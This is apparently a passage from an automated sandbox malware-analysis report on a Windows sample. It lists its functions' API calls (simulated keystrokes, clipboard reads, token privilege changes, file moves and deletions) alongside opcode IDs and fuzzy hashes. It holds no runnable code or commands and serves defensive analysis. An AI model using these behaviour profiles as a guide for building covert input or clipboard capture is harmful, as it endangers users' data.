                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 783c2dc934f25900fbc3c2e6eccd18e48a7c6826399e7acf5a28618d6926d85b
                                                                                  • Instruction ID: d406395cd0e65fea69a51fdc9b3f493855435c74cc65dad01c29f29646572fca
                                                                                  • Opcode Fuzzy Hash: 783c2dc934f25900fbc3c2e6eccd18e48a7c6826399e7acf5a28618d6926d85b
                                                                                  • Instruction Fuzzy Hash: DF414C705046118FDB24DF14C444B1ABFF0BF85308F1989ACE99A4B3A2C372E885CF52
                                                                                  Function 004F41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F4214: FreeLibrary.KERNEL32(00000000,?), ref: 004F4247
                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004F39FE,?,00000001), ref: 004F41DB
                                                                                    • Part of subcall function 004F4291: FreeLibrary.KERNEL32(00000000), ref: 004F42C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Free$Load
                                                                                  • String ID:
                                                                                  • API String ID: 2391024519-0
                                                                                  • Opcode ID: d0654e0006d9cdea6fc7eda5064e48a9b070fc1900d67f7610d5bc4ccd56b62f
                                                                                  • Instruction ID: d9a3cc84f7de167f44cc74c6f88872426073e1202788d59c3eaa9dd7957606e0
                                                                                  • Opcode Fuzzy Hash: d0654e0006d9cdea6fc7eda5064e48a9b070fc1900d67f7610d5bc4ccd56b62f
                                                                                  • Instruction Fuzzy Hash: 5811C83160020AAADB10AB75DC06FAF77A5AFC0744F10443EB656A61C1DF789A419B64
                                                                                  Function 00569B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 80c76484d076cf40e66842ae9e723e2b6ed62cc70989f59808de0c5dcca49972
                                                                                  • Instruction ID: 32c51b84a196eae1d9f79e3cdc8aada38a5abfc35e5d22d5d8eaf0afa1328984
                                                                                  • Opcode Fuzzy Hash: 80c76484d076cf40e66842ae9e723e2b6ed62cc70989f59808de0c5dcca49972
                                                                                  • Instruction Fuzzy Hash: D721F4705086018FDB24DF68C448B2EBFF1BF84344F154968EA9A5B6A2D732E845DF62
                                                                                  Function 0051AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___lock_fhandle.LIBCMT ref: 0051AFC0
                                                                                    • Part of subcall function 00517BDA: __getptd_noexit.LIBCMT ref: 00517BDA
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                                  • String ID:
                                                                                  • API String ID: 1144279405-0
                                                                                  • Opcode ID: 2d1c626a21f116b176b5986c5eec1a0cb7aa9e05ca0be0c4f64e92c3a7940ddf
                                                                                  • Instruction ID: 0b6490ff041dd28aad51b832d121beac6c1d479015571efb4f10c1c24a19b7e4
                                                                                  • Opcode Fuzzy Hash: 2d1c626a21f116b176b5986c5eec1a0cb7aa9e05ca0be0c4f64e92c3a7940ddf
                                                                                  • Instruction Fuzzy Hash: AC1190728096059FF7126FA8C8497DE3E60BF89335F194740E4300B1E2D7B49DC49BA1
                                                                                  Function 004F39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                  • Instruction ID: b719697a787a50b3e44d40733306c681529280a08a7a651ee39f7fb55a5bd112
                                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                  • Instruction Fuzzy Hash: 8001867150010EAFCF04EF65C8828FFBF74AF50344F00806AB61697195EA349A49CB64
                                                                                  Function 00512AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 00512AED
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2597487223-0
                                                                                  • Opcode ID: ba8106758aa7c41f934fb5f0957cd3bf48a9155a6bd0d6a4deac1b8ffeb6780e
                                                                                  • Instruction ID: 5ef7a1b1885e949692882f60d0822ce5c39ec12a286d10155ddc98b8559637d8
                                                                                  • Opcode Fuzzy Hash: ba8106758aa7c41f934fb5f0957cd3bf48a9155a6bd0d6a4deac1b8ffeb6780e
                                                                                  • Instruction Fuzzy Hash: B7F0623150020AAAFF21AF788C0A7DF3EA5BF80310F154515B4149A191D7B88AE2DB51
                                                                                  Function 004F4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,004F39FE,?,00000001), ref: 004F4286
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: d38e912582733548f43dee21cca9de0a4c6691c75fed00dd6e0c79767f0a4a71
                                                                                  • Instruction ID: 8b87bd062d96786f1f42a173b6290677bf4b6b33b374bc4f3826d73a0945d457
                                                                                  • Opcode Fuzzy Hash: d38e912582733548f43dee21cca9de0a4c6691c75fed00dd6e0c79767f0a4a71
                                                                                  • Instruction Fuzzy Hash: F0F05870404306CFCB348F609490823BBE0BE803653268ABFE28682610CB359884DB54
                                                                                  Function 004F40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004F40C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongNamePath
                                                                                  • String ID:
                                                                                  • API String ID: 82841172-0
                                                                                  • Opcode ID: a088ef47b3156bed397eb87662201790543fcb15686a44f3697071c046c83950
                                                                                  • Instruction ID: 2fdd0ce4905607a764244043bb3e305d3a4129ac9c987f84e9e9444a359487fe
                                                                                  • Opcode Fuzzy Hash: a088ef47b3156bed397eb87662201790543fcb15686a44f3697071c046c83950
                                                                                  • Instruction Fuzzy Hash: FCE0CD775001245BC7119654DC46FFA77ADDFC8694F050075F909E7244D97499C196A0
                                                                                  Function 015F75E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 015F75F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction ID: 7d4285b6cd0cfb760ae9cd5e49482241796554e5cc9a34d96092b38047002aa7
                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction Fuzzy Hash: 90E0BF7494010D9FDB00DFA8D54969D7BB4EF04701F1005A5FD0192281D67099508A62

                                                                                  Non-executed Functions

                                                                                  Function 0055AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0055B1CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: %d/%02d/%02d
                                                                                  • API String ID: 3850602802-328681919
                                                                                  • Opcode ID: c4ccf3ecb489a61dab36a23ace1c0adb94389e32a7a8aa158fc9bdf78d99a67c
                                                                                  • Instruction ID: 6cd57e020466730660ed7e0ebb89e152fa0167d53648bb470457b76b2d7bc25f
                                                                                  • Opcode Fuzzy Hash: c4ccf3ecb489a61dab36a23ace1c0adb94389e32a7a8aa158fc9bdf78d99a67c
                                                                                  • Instruction Fuzzy Hash: 2F12EC71500609AFEB249F24DC69FAE7FB8FF84311F10421AFD19AA2D0DB708949DB61
                                                                                  Function 0050EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0050EB4A
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00563AEA
                                                                                  • IsIconic.USER32(000000FF), ref: 00563AF3
                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00563B00
                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00563B0A
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00563B20
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00563B27
                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00563B33
                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00563B44
                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00563B4C
                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00563B54
                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00563B57
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B6C
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563B77
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B81
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563B86
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B8F
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563B94
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B9E
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563BA3
                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00563BA6
                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00563BCD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 4125248594-2988720461
                                                                                  • Opcode ID: 4b2cc07f1120a6d271646af7257928dbb0442e4b74d8e6d3a9516e54f3c1d4ad
                                                                                  • Instruction ID: 36e6da66723b48544f9988959d716108b1e2c00b76712d04c2736093f9052037
                                                                                  • Opcode Fuzzy Hash: 4b2cc07f1120a6d271646af7257928dbb0442e4b74d8e6d3a9516e54f3c1d4ad
                                                                                  • Instruction Fuzzy Hash: 35316171A40218BBEB206BA59C4AF7F7E7CEF54B50F104015FA09EB1E0DAB15D44BAB0
                                                                                  Function 0052ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0052B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0052B180
                                                                                    • Part of subcall function 0052B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0052B1AD
                                                                                    • Part of subcall function 0052B134: GetLastError.KERNEL32 ref: 0052B1BA
                                                                                  • _memset.LIBCMT ref: 0052AD08
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0052AD5A
                                                                                  • CloseHandle.KERNEL32(?), ref: 0052AD6B
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0052AD82
                                                                                  • GetProcessWindowStation.USER32 ref: 0052AD9B
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 0052ADA5
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0052ADBF
                                                                                    • Part of subcall function 0052AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0052ACC0), ref: 0052AB99
                                                                                    • Part of subcall function 0052AB84: CloseHandle.KERNEL32(?,?,0052ACC0), ref: 0052ABAB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                  • String ID: $H*Z$default$winsta0
                                                                                  • API String ID: 2063423040-737746828
                                                                                  • Opcode ID: 52a47bb7c67102ce031efc20df742c601223dd2661b037ba8f04ab53232a7f70
                                                                                  • Instruction ID: 46178f1f2bb8a9c114c7f03389c1f3219d2b6cd899b1751c522b6e1ab08fa742
                                                                                  • Opcode Fuzzy Hash: 52a47bb7c67102ce031efc20df742c601223dd2661b037ba8f04ab53232a7f70
                                                                                  • Instruction Fuzzy Hash: 4981AC71800219AFDF219FA4EC49AEEBFB8FF1A304F044119F814A61A1D7718E95EB61
                                                                                  Function 005360DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00535FA6,?), ref: 00536ED8
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00535FA6,?), ref: 00536EF1
                                                                                    • Part of subcall function 0053725E: __wsplitpath.LIBCMT ref: 0053727B
                                                                                    • Part of subcall function 0053725E: __wsplitpath.LIBCMT ref: 0053728E
                                                                                    • Part of subcall function 005372CB: GetFileAttributesW.KERNEL32(?,00536019), ref: 005372CC
                                                                                  • _wcscat.LIBCMT ref: 00536149
                                                                                  • _wcscat.LIBCMT ref: 00536167
                                                                                  • __wsplitpath.LIBCMT ref: 0053618E
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 005361A4
                                                                                  • _wcscpy.LIBCMT ref: 00536209
                                                                                  • _wcscat.LIBCMT ref: 0053621C
                                                                                  • _wcscat.LIBCMT ref: 0053622F
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0053625D
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0053626E
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00536289
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00536298
                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 005362AD
                                                                                  • DeleteFileW.KERNEL32(?), ref: 005362BE
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005362E1
                                                                                  • FindClose.KERNEL32(00000000), ref: 005362FD
                                                                                  • FindClose.KERNEL32(00000000), ref: 0053630B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1917200108-1173974218
                                                                                  • Opcode ID: c2988175a8b2eeb1b57e79cd6ce8c9ed683beed787bbc8f5ea4bc08485a6ff71
                                                                                  • Instruction ID: 8fcf2f25cc62369382e848ace5d9172cd026441a0b6ee183874dfb6d54696fbe
                                                                                  • Opcode Fuzzy Hash: c2988175a8b2eeb1b57e79cd6ce8c9ed683beed787bbc8f5ea4bc08485a6ff71
                                                                                  • Instruction Fuzzy Hash: FD514EB680811D6ACB21EB91DC48DDBBBBCBF15300F0544EAE549E3041DE7697899FA4
                                                                                  Function 00546B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(0058DC00), ref: 00546B36
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00546B44
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00546B4C
                                                                                  • CloseClipboard.USER32 ref: 00546B58
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00546B74
                                                                                  • CloseClipboard.USER32 ref: 00546B7E
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00546B93
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00546BA0
                                                                                  • GetClipboardData.USER32(00000001), ref: 00546BA8
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00546BB5
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00546BE9
                                                                                  • CloseClipboard.USER32 ref: 00546CF6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                  • String ID:
                                                                                  • API String ID: 3222323430-0
                                                                                  • Opcode ID: 72bd08dbcc16ba7085d1b8993bba6036ffea654c701e2a7097959d72782a447a
                                                                                  • Instruction ID: 834ab8d5e373898ef227e24379e910db8638a8361b8a49735ff76cc9ab55b1ea
                                                                                  • Opcode Fuzzy Hash: 72bd08dbcc16ba7085d1b8993bba6036ffea654c701e2a7097959d72782a447a
                                                                                  • Instruction Fuzzy Hash: 0751A2312002066BD300AF61ED86FBE7BB8FF95B15F00042DF64AD61D1DF60E849AA62
                                                                                  Function 0053F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0053F62B
                                                                                  • FindClose.KERNEL32(00000000), ref: 0053F67F
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0053F6A4
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0053F6BB
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0053F6E2
                                                                                  • __swprintf.LIBCMT ref: 0053F72E
                                                                                  • __swprintf.LIBCMT ref: 0053F767
                                                                                  • __swprintf.LIBCMT ref: 0053F7BB
                                                                                    • Part of subcall function 0051172B: __woutput_l.LIBCMT ref: 00511784
                                                                                  • __swprintf.LIBCMT ref: 0053F809
                                                                                  • __swprintf.LIBCMT ref: 0053F858
